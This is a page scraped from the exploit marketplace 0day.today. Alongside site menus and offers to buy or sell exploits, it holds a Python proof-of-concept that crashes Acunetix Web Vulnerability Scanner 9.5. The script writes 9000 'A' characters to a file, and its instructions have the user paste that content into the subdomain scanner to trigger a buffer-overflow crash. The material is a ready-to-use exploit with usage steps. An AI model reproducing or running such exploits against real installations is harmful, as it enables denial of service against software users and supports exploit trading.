0day.today - Biggest Exploit Database in the World.

- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!

Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Acunetix Web Vulnerability Scanner 9.5 - Crash PoC Exploit
#!/usr/bin/env python # Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept # Website : https://www.acunetix.com # Tested : win 7 / win 8.1 / win vista # # # Author : Hadi Zomorodi Monavar # Email : zomorodihadi@gmail.com # # 1 . run python code : python poc.py # 2 . open hadi.txt and copy content to clipboard # 3 . open "Acunetix Web Vulnerability Scanner 9.5" # 4 . from Tools Explorer --> subdomain scanner # 5 . Paste ClipBoard on "Domain" # 6 . Click start # 7 . Crashed ;) crash = "\x41"*9000 #B0F file = open("hadi.txt", "w") file.write(crash) file.close() # 0day.today [2024-12-27] #